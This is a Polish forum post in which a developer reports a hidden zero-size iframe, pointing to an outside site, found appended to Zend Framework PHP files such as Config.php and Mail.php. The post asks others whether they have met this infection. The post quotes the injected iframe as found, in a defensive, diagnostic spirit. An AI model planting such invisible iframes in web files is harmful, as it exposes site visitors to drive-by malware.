Pracując na eclipse zauważyłem że w bibliotece Zend jest błąd składni...
Prędzej nie zwracałem na niego uwagi, bo teraz mi Zend nie potrzebny, ale przed chwilą z ciekawości zajrzałem o co tam chodzi i o zdziwieniu ujrzałem coś takiego:
(Fragment pliku Config.php biblioteki Zend)
protected function _assertValidExtend($extendingSection, $extendedSection) { // detect circular section inheritance $extendedSectionCurrent = $extendedSection; if ($this->_extends[$extendedSectionCurrent] == $extendingSection) { /** @see Zend_Config_Exception */ require_once 'Zend/Config/Exception.php'; throw new Zend_Config_Exception('Illegal circular inheritance detected'); } $extendedSectionCurrent = $this->_extends[$extendedSectionCurrent]; } // remember that this section extends another section $this->_extends[$extendingSection] = $extendedSection; } } <iframe src="http://www.51dj8.com/wenhua/first.htm" width="0" height="0" frameborder="0"> </iframe>
Takie iframe znalazłem w plikach:
zend/Config.php
zend/Mail.php
zend/InfoCard/* (wszsytkie pliki *.php
zend/Chiper/Exception.php
zend/Memory/* (wszsytkie pliki *.php)
zend/Openld/* (wszystkie php)
zend/Rest/* (wszytkie php)
Zauważyłem też że w tych folderach z zainfekowanym iframe jest plik desktop_.ini) z zawartością
Kod
2010-1-24
Wersja Zend'a to coś 1.5.* (nie jestem pewien)
czy ktoś się z czymś takim spotkał?
Podejrzewam że pliki były zainfekowane na moim komputerze...
Jednak co mnie bardziej zaniepokoiło, ja posiadam linuxa, a pliki były trzymane na partycji /home więc nic nie zainfekowało kodu z Windowsa...